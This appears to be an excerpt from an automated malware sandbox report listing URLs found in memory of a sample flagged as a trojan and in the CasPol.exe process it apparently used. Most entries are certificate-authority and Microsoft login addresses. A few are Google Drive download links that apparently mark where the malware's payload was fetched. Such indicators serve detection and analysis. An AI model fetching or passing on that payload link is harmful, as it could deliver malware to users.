Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.anf.es/es/address-direccion.html
Source: mpam-60574f34.exe, 00000010.00000003.18740725593.0000016C07975000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18740268669.0000016C07975000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682296383.0000000020824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
Source: CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
Source: CasPol.exe, 00000005.00000003.18600919578.0000000020866000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601190951.000000002072C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-int0
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18602156620.0000000020831000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-std0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.defence.gov.au/pki0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: CasPol.exe, 00000005.00000003.19683625040.000000001F957000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23253192039.000000001F95A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: CasPol.exe, 00000005.00000003.19683625040.000000001F957000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23253192039.000000001F95A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.disig.sk/ca0f
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682296383.0000000020824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.e-me.lv/repository0
Source: CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: CasPol.exe, 00000005.00000003.18602156620.0000000020831000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682407629.0000000020834000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: CasPol.exe, 00000005.00000003.18601190951.000000002072C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ecee.gov.pt/dpc0
Source: CasPol.exe, 00000005.00000002.23256187565.0000000020822000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682296383.0000000020824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.eme.lv/repository0
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682296383.0000000020824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.globaltrust.info0
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.globaltrust.info0=
Source: CasPol.exe, 00000005.00000003.18600919578.0000000020866000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: MpSigStub.exe, 00000013.00000003.18808585691.000001F8CEA95000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18809059455.000001F8CEAA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c_
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oaticerts.com/repository.
Source: CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682296383.0000000020824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0
Source: CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0%
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682472622.000000002083C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.rcsc.lt/repository0
Source: CasPol.exe, 00000005.00000003.18600919578.0000000020866000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sk.ee/cps/0
Source: CasPol.exe, 00000005.00000003.18600919578.0000000020866000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682774918.000000002073F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18600919578.0000000020866000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601190951.000000002072C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/dpc0
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601190951.000000002072C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/lcr0#
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: CasPol.exe, 00000005.00000003.18600919578.0000000020866000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: mpam-60574f34.exe, 00000010.00000003.18533279750.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18754550374.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp, MpOAV.dll0.16.dr	String found in binary or memory: http://www.validationtest.contoso.com/test%ld.htmlMpOAV_ForceDeepScan
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
Source: CasPol.exe, 00000005.00000002.23255092763.0000000020728000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23253044443.000000001F941000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: CasPol.exe, 00000005.00000002.23255092763.0000000020728000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23253044443.000000001F941000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?w=
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=806015
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976530622.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976530622.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/msangcwam
Source: edb.log.4.dr	String found in binary or memory: https://clients2.google.com/service/check2?crx3=true&appid=%7B430FD4D0-B729-4F61-AA34-91526481799D%7
Source: CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: CasPol.exe, 00000005.00000003.18453888800.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: CasPol.exe, 00000005.00000003.18459747894.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23219964862.0000000001367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0g-34-docs.googleusercontent.com/
Source: CasPol.exe, 00000005.00000003.18459747894.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18453888800.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23220195823.0000000001389000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18459694691.00000000013A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0g-34-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/glr6brug
Source: CasPol.exe, 00000005.00000002.23219964862.0000000001367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0g-34-docs.googleusercontent.com/s_
Source: CasPol.exe, 00000005.00000002.23219609628.000000000132B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/6
Source: CasPol.exe, 00000005.00000002.23219609628.000000000132B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/V%-
Source: CasPol.exe, 00000005.00000002.23219964862.0000000001367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1c-6Y7E6EFCnEfeUqjiCzqb4bjj7oMV7b
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://eca.hinet.net/repository0
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: mpam-60574f34.exe, 00000010.00000003.18740725593.0000016C07975000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18740268669.0000016C07975000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Azure/azure-storage-cpp)
Source: mpam-60574f34.exe, 00000010.00000003.18740725593.0000016C07975000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18740268669.0000016C07975000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/cpprestsdk)
Source: mpam-60574f34.exe, 00000010.00000003.18740725593.0000016C07975000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18740268669.0000016C07975000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/open-source-parsers/jsoncpp.git)
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.liv
Source: svchost.exe, 0000001D.00000003.21977118694.000002C168D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23220023205.000002C168260000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977227438.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977351770.000002C168D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000001D.00000003.21977501299.000002C168D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 0000001D.00000002.23221786081.000002C168D6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977501299.000002C168D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000001D.00000003.21977501299.000002C168D6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601er
